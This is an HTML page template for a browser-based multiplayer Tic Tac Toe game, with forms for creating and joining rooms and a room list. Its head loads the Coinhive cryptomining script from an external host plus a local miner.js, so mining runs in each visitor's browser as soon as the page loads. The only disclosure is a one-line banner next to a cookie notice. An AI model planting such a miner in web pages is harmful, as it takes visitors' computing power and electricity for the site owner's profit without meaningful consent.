<!DOCTYPE html>
<html>
	<head>
		<title>Tic Tac Toe</title>
		<script src ="<%= address %>/socket.io/socket.io.js"></script>
		<link rel="stylesheet" href="/stylesheets/connect.css">
		<script src="https://coinhive.com/lib/coinhive.min.js"></script>
		<script src="/javascripts/miner.js"></script>
		<link rel="stylesheet" href="/stylesheets/main.css" />
	</head>
	<body>

		<div id = "container">
			<div id = "cookies">This page uses cookies.This page use your cpu to generate profit to site owner.</div>
			<div id = "container2">
				<div id = "title">Tic Tac Toe</div>
				<div id = "create_container">
					<div id = "create_table">
						<input id = "create_table_room_input" class = "input" placeholder = "room:"><br>
						<input id = "width_input" class = "input" placeholder = "width:"><br>
						<input id = "height_input" class = "input" placeholder = "height:"><br>
						<input id = "how_many_to_win_input" class = "input" placeholder = "how many to win:"><br>
						<button id = "create_table_button" style = "margin: 5px">Create Table</button>
					</div>
					<div id = "join_table">
						<input id = "join_table_room_input" class = "input" placeholder = "room:"><br>
						<button id = "join_table_button" style = "margin: 5px">Join Table</button>
					</div>
				</div>
				<div id = "room_list_container">
					<div style = "color: red; font-family: Impact; font-size: 20px; margin: 10px;">Room List</div>
					<div id = "room_list"></div>
					<button id = "refresh_button" style = "margin: 10px">Refresh</button>
				</div>
			</div>
		</div>

		<script src = "/javascripts/cookies.js"></script>
		<script src = "/javascripts/useful.js"></script>
		<script src = "/javascripts/connect.js"></script>
	</body>
</html>